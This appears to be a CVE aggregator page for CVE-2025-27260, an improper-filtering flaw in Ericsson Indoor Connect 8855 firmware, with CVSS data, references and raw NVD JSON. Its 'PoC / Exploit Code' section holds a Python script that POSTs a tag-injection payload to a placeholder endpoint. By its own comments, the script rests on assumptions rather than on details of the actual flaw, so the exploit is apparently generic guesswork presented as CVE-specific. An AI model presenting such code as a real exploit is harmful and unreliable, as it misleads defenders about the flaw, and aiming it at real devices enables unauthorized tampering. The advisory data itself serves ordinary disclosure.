CVE-2025-27260

Description

Ericsson Indoor Connect 8855 versions prior to 2025.Q3 contains an Improper Filtering of Special Elements vulnerability which, if exploited, can lead to unauthorized modification of certain information

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:ericsson:indoor_connect_8855_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:ericsson:indoor_connect_8855:-:*:*:*:*:*:*:* - NOT VULNERABLE

Ericsson Indoor Connect 8855 < 2025.Q3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Proof of Concept for CVE-2025-27260
# Target: Ericsson Indoor Connect 8855 < 2025.Q3
# Description: Improper Filtering of Special Elements leading to unauthorized modification.

target_url = "http://target-ip/api/vulnerable_endpoint"  # Replace with actual target endpoint
headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/json"
}

# Payload attempting to inject special elements to modify data
# Example assumes a JSON field that is concatenated into a command or query without sanitization
payload = {
    "config_id": "admin_settings",
    "value": "original_value</parameter><malicious_parameter>attacker_controlled_value</malicious_parameter>"
}

try:
    response = requests.post(target_url, json=payload, headers=headers, timeout=10)
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Response from server:")
        print(response.text)
        print("[+] Verify if the configuration has been modified on the target system.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-27260
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-27260
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-27260/
[4] VulDB https://vuldb.com/cve/CVE-2025-27260
[5] https://www.ericsson.com/en/about-us/security/psirt/CVE-2025-27260
[6] https://www.ericsson.com/en/about-us/security/psirt/security-bulletin-indoorconnect-march-2026

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-27260", "sourceIdentifier": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "published": "2026-03-25T14:16:30.100", "lastModified": "2026-03-27T18:33:18.243", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ericsson\nIndoor Connect 8855 versions prior to 2025.Q3 contains an Improper Filtering of Special\nElements vulnerability which, if exploited, can lead to unauthorized\nmodification of certain information"}, {"lang": "es", "value": "Ericsson\nLas versiones de Indoor Connect 8855 anteriores a 2025.Q3 contienen una vulnerabilidad de Filtrado Inadecuado de Elementos Especiales que, si se explota, puede conducir a la modificación no autorizada de cierta información."}], "metrics": {"cvssMetricV40": [{"source": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-790"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:ericsson:indoor_connect_8855_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.q3", "matchCriteriaId": "37C4F98B-D38A-47A6-B294-23A5E6291A81"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:ericsson:indoor_connect_8855:-:*:*:*:*:*:*:*", "matchCriteriaId": "3B0C1261-B15A-4D91-AC65-9834D16A94F1"}]}]}], "references": [{"url": "https://www.ericsson.com/en/about-us/security/psirt/CVE-2025-27260", "source": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "tags": ["Vendor Advisory"]}, {"url": "https://www.ericsson.com/en/about-us/security/psirt/security-bulletin-indoorconnect-march-2026", "source": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "tags": ["Vendor Advisory"]}]}}